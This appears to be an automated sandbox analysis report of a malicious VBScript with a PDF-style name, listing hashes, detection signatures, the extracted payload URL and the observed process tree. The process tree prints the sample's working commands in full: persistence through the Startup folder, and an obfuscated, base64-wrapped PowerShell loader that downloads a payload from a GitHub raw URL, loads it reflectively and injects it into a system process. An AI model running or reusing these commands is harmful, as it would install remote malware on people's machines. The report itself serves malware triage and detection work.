Analysis
-
max time kernel
117s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
04-10-2024 08:37
Static task
static1
Behavioral task
behavioral1
Sample
PDFDQ_P01_303B9367_2024-10-03_185650.vbs
Resource
win7-20240903-en
General
-
Target
PDFDQ_P01_303B9367_2024-10-03_185650.vbs
-
Size
486KB
-
MD5
bfe8bd92459f45bda7c2144a9ae3ad70
-
SHA1
5c8a674b4dec5b7c6bfe579d5ba7c30bd426b66f
-
SHA256
705d179b125a94e56fdcc774436bf47e3f6680b126bfdb0637657db07fa78139
-
SHA512
fbd3c5fa3bf90cec9227912c203898870716d0cb50b0a6caade19aaf4493dce3cc4a7c1a77c713fe8963159d3195837ca1ef6dcfde8700fceed633aa7c3e7d06
-
SSDEEP
12288:KZejbep/wU35vTs06uFBRBzPupRWdOrDt/bDqPm3hqekZEeWZCmHFLCCAYpdStSU:NX2oZLRgIZ2
Malware Config
Extracted
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 980 powershell.exe 6 980 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 2208 powershell.exe 980 powershell.exe 2604 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rectifloro.vbs WScript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rectifloro.vbs WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 4 raw.githubusercontent.com 5 raw.githubusercontent.com 6 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2780 cmd.exe 2768 PING.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2768 PING.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2604 powershell.exe 2208 powershell.exe 980 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2604 powershell.exe Token: SeDebugPrivilege 2208 powershell.exe Token: SeDebugPrivilege 980 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2676 wrote to memory of 2780 2676 WScript.exe 31 PID 2676 wrote to memory of 2780 2676 WScript.exe 31 PID 2676 wrote to memory of 2780 2676 WScript.exe 31 PID 2780 wrote to memory of 2768 2780 cmd.exe 33 PID 2780 wrote to memory of 2768 2780 cmd.exe 33 PID 2780 wrote to memory of 2768 2780 cmd.exe 33 PID 2780 wrote to memory of 2604 2780 cmd.exe 34 PID 2780 wrote to memory of 2604 2780 cmd.exe 34 PID 2780 wrote to memory of 2604 2780 cmd.exe 34 PID 2676 wrote to memory of 2208 2676 WScript.exe 35 PID 2676 wrote to memory of 2208 2676 WScript.exe 35 PID 2676 wrote to memory of 2208 2676 WScript.exe 35 PID 2208 wrote to memory of 980 2208 powershell.exe 37 PID 2208 wrote to memory of 980 2208 powershell.exe 37 PID 2208 wrote to memory of 980 2208 powershell.exe 37
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PDFDQ_P01_303B9367_2024-10-03_185650.vbs"1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\PDFDQ_P01_303B9367_2024-10-03_185650.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orolfitcer.vbs')')2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 103⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\PDFDQ_P01_303B9367_2024-10-03_185650.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orolfitcer.vbs')')3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aUV4ICgoJ2wnKydjJysnWicrJ3VybCA9JysnIFU4Y2h0dHAnKydzOi8vJysncmF3LicrJ2dpdCcrJ2h1YicrJ3UnKydzZXInKydjbycrJ250JysnZW50LmNvbS8nKydOb0RldGVjdE9uL05vRGV0ZScrJ2N0TycrJ24vcmVmcy8nKydoZScrJ2FkcycrJy9tYWluL0RlJysndGEnKydoTm90JysnaC1WLnR4dCcrJ1U4YzsgJysnbGMnKydaYmFzZTY0JysnQ28nKydudGVudCA9ICcrJyhOZXctT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2wnKydpZW50KS5Eb3cnKyduJysnbG9hJysnZFN0cmknKyduZygnKydsYycrJ1p1cmwnKycpJysnOyBsJysnY1piaW5hcnlDb250ZScrJ250ID0gW1MnKyd5JysncycrJ3RlbS5DbycrJ252ZXInKyd0XTonKyc6JysnRnJvbUJhJysnc2UnKyc2JysnNFN0cmluZyhsY1onKydiYXNlNjRDb250ZW4nKyd0KScrJzsnKycgbGNaYXNzJysnZW0nKydibHkgJysnPSBbJysnUmVmbCcrJ2VjdGknKydvbi5BcycrJ3NlbWJseV06OkxvJysnYWQobCcrJ2MnKydaJysnYmluJysnYXJ5JysnQ29udGVuJysndCknKyc7JysnIFtkbmxpYi4nKydJTy5Ib20nKydlJysnXTo6JysnVkFJKFI3ODAnKycvQ28nKydoJysnblUvZC8nKydlZS5lJysndCcrJ3NhcC8nKycvOnNwdHQnKydoUicrJzc4LCBSNzhkZXMnKydhdCcrJ2knKyd2YWRvUjc4LCcrJyBSNycrJzgnKydkZXNhdGknKyd2JysnYWQnKydvUjc4LCAnKydSNzhkZXNhJysndCcrJ2knKyd2YWRvUjc4JysnLCBSNycrJzhBZGRJblAnKydyb2Nlc3MzMlInKyc3OCwgUjc4UicrJzc4LFI3OFI3OCcrJyknKS5yRXBsYWNFKCdsY1onLFtzdHJJTkddW0NIQXJdMzYpLnJFcGxhY0UoKFtDSEFyXTg1K1tDSEFyXTU2K1tDSEFyXTk5KSxbc3RySU5HXVtDSEFyXTM5KS5yRXBsYWNFKChbQ0hBcl04MitbQ0hBcl01NStbQ0hBcl01NiksW3N0cklOR11bQ0hBcl0zNCkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "iEx (('l'+'c'+'Z'+'url ='+' U8chttp'+'s://'+'raw.'+'git'+'hub'+'u'+'ser'+'co'+'nt'+'ent.com/'+'NoDetectOn/NoDete'+'ctO'+'n/refs/'+'he'+'ads'+'/main/De'+'ta'+'hNot'+'h-V.txt'+'U8c; '+'lc'+'Zbase64'+'Co'+'ntent = '+'(New-Object S'+'ystem.Net.WebCl'+'ient).Dow'+'n'+'loa'+'dStri'+'ng('+'lc'+'Zurl'+')'+'; l'+'cZbinaryConte'+'nt = [S'+'y'+'s'+'tem.Co'+'nver'+'t]:'+':'+'FromBa'+'se'+'6'+'4String(lcZ'+'base64Conten'+'t)'+';'+' lcZass'+'em'+'bly '+'= ['+'Refl'+'ecti'+'on.As'+'sembly]::Lo'+'ad(l'+'c'+'Z'+'bin'+'ary'+'Conten'+'t)'+';'+' [dnlib.'+'IO.Hom'+'e'+']::'+'VAI(R780'+'/Co'+'h'+'nU/d/'+'ee.e'+'t'+'sap/'+'/:sptt'+'hR'+'78, R78des'+'at'+'i'+'vadoR78,'+' R7'+'8'+'desati'+'v'+'ad'+'oR78, '+'R78desa'+'t'+'i'+'vadoR78'+', R7'+'8AddInP'+'rocess32R'+'78, R78R'+'78,R78R78'+')').rEplacE('lcZ',[strING][CHAr]36).rEplacE(([CHAr]85+[CHAr]56+[CHAr]99),[strING][CHAr]39).rEplacE(([CHAr]82+[CHAr]55+[CHAr]56),[strING][CHAr]34) )"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:980
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\R8Y8LL44TS3KTI0XQF7N.temp
Filesize7KB
MD568df6265b97e126f718868aad1fc4e6b
SHA1867a40618033b58fa60ad1027e2b61c9d0d3f1a9
SHA2560178a60b2bc8cc5b172c2da71315138b16b66fc25270cf83254562cd19bc47e3
SHA5120d8f9d621c387f6dc3742fd1f089136cc1e48b82de802e07950a1a24998bb47c09278145fcf3cec90a4603c379fd480c18630c34ebf403e0f50893c55f46f93c